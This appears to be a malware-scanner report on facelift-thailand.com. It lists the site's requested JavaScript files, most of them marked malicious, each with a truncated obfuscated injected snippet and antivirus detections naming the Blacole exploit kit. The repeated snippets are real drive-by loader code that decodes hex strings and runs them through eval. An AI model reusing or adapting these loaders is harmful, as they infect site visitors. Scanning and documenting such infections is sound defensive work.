Request | Server response | Status |
http://facelift-thailand.com/ | 200 OK Content-Length: 43356 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jxhfo="s"+"p"+"li"+"t";iwz=window;ghsbtk="dy";cuylf=document;dhczd="0x";cnbhfa=(5-3-1);try{++(cuylf.body)}catch(qkqcgk){mjk=false;try{}catch(ogmh){mjk=21;} if(1){gwx="17:5d:6c:65:5a:6b:60:66:65:17:69:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:69:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64 ...[4013 bytes skipped]... Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://facelift-thailand.com/x-js/jquery.js | 200 OK Content-Length: 79143 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-js/jquery.jqtransform.js | 200 OK Content-Length: 18134 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-js/droplinemenu.js | 200 OK Content-Length: 6684 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-js/easySlider1.5.js | 200 OK Content-Length: 8856 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-js/common.js | 200 OK Content-Length: 6320 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-fancybox/jquery.mousewheel-3.0.2.pack.js | 200 OK Content-Length: 5608 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-fancybox/jquery.fancybox-1.3.1.js | 200 OK Content-Length: 28732 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-js/jquery.validationEngine-en.js | 200 OK Content-Length: 6708 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-js/jquery.validationEngine.js | 200 OK Content-Length: 28805 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-js/jquery-ui-1.8.2.custom.min.js | 200 OK Content-Length: 42536 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
